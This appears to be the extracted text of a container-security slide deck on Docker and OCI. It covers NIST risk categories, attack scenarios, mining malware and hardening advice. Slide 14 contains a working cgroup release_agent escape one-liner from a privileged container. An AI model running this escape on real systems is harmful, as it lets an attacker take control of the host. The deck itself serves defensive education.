  • 6. Open Container Initiative - OCI • Runtime Spec • namespace • cgroups • Image Spec • Layer • Image index • Configuration
  • 11. Host OS Risk Orchestration System Risks Image Risks Container Runtime RisksRegistry Risks •Improper user access rights •OS vulnerabilities •Unbounded admin access •Weak or unmanaged credentials •Unmanaged inter-container network traffic •Mixed of workload sensitivity levels •Insecure connections to registries •Stale images in registries •Image vulnerabilities •Image configuration •Embedded malware •Embedded secrets •Image trust •Vulnerabilities within the runtime software •Unbounded network access from containers •Insecure container runtime configurations •Shared kernel https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf
  • 13. Container should not run as root Use non-root user in your Dockerfile
  • 14. Privileged Container is so Bad d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o https://twitter.com/_fel1x/status/1151487051986087936
  • 16. Open Docker API Docker host Client Host Geek
  • 17. Attack Scenario I Vulnerable Container 1. Attack vulnerable container 2. Compromise the host Docker Host or K8s Cluster
  • 18. Attack Scenario II Bad Container 1. Push bad image 2. Deploy by admin 3. Create bad container Docker Host or K8s cluster
  • 19. Attack Scenario III Privileged Container 1. Find out open docker host 2. Create privileged container 3. Compromise the host Open Docker Host
  • 20. Bad Image for Cryptocurrency Mining https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
  • 21. Kinsing Malware Attacks Targeting Container Env https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
  • 24. • Always use the most up to date version of Docker • Allow only trusted users control of the Docker daemon by making sure only trusted users are members of Docker group • Run your containers as a non-root user (UID not 0) • Use only trusted base images when building your containers • Use minimal base images that don’t include unnecessary software packages that could lead to a larger attack surface • Don’t store secrets in images/Dockerfiles • When running containers, remove all capabilities not required for the container to function as needed • Don’t run containers with –privileged flag • Don’t mount sensitive host system directories on containers, especially in writable mode that could expose them to being changed maliciously in a way that could lead to host compromise • Don’t run sshd within containers • Don’t map any ports below 1024 within a container as they are considered privileged because they transmit sensitive data • Make sure you have rules in place that give you an audit trail for: • Docker daemon and Docker files and directories: • /var/lib/docker • /etc/docker • docker.service • docker.socket • /etc/default/docker • /etc/docker/daemon.json • /etc/sysconfig/docker • /usr/bin/containerd • /usr/sbin/runc https://www.stackrox.com/post/2019/09/docker-security-101/
  • 25. CAP-ADD instead of Privileged • —cap-add • SYS_ADMIN • NET_ADMIN • MAC_ADMIN • NET_RAW • SYS_TIME • SYSLOG • … https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
  • 26. Limit Resource Usage • —memory • —cpus • —cpu-period • —pids-limit • —kernel-memory • —device-read-bps • —device-read-ios • —device-write-bgp • —device-write-ios https://docs.docker.com/config/containers/resource_constraints/
  • 27. Open Source Tools for Docker Security • Docker Bench for Security • Clair • Cilium • Anchore • OpenSCAP Workbench • Dagda • Notary • Grafaes • Sysdig Falco • Banyanops Collector https://techbeacon.com/security/10-top-open-source-tools-docker-security
  • 29. Container Visibility is So Damn Important https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/
  • 32. • https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/ • https://www.docker.com/blog/containers-replacing-virtual-machines/ • https://blog.aquasec.com/cve-2016-9962-run-container-run • https://medium.com/@mccode/processes-in-containers-should-not-run-as- root-2feae3f0df3b • https://containerjournal.com/topics/container-security/why-running-a-privileged- container-is-not-a-good-idea/ • https://docs.docker.com/engine/api/ • https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate • https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/ malicious-docker-hub-container-images-cryptocurrency-mining • https://docs.docker.com/config/containers/resource_constraints/ • https://techbeacon.com/security/10-top-open-source-tools-docker-security